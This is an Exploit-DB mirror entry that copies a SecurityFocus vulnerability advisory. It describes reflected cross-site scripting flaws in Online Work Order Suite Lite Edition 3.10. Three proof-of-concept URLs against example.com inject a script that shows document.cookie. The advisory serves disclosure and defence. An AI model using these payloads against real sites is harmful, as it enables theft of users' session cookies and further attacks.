exploit-db-mirror/platforms/asp/webapps/34492.txt
Offensive Security eb388cdbdd Updated 09_02_2014
2014-09-02 04:43:04 +00:00

11 lines
847 B
Text
Executable file

source: http://www.securityfocus.com/bid/42535/info
Online Work Order Suite Lite Edition is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Online Work Order Suite Lite Edition 3.10 is vulnerable; other versions may also be affected.
http://www.example.com/demo/owoslite/default.asp?show="><script>alert(document.cookie);</script>
http://www.example.com/demo/owoslite/login.asp?go="><script>alert(document.cookie);</script>
http://www.example.com/demo/owoslite/report.asp?show="><script>alert(document.cookie);</script>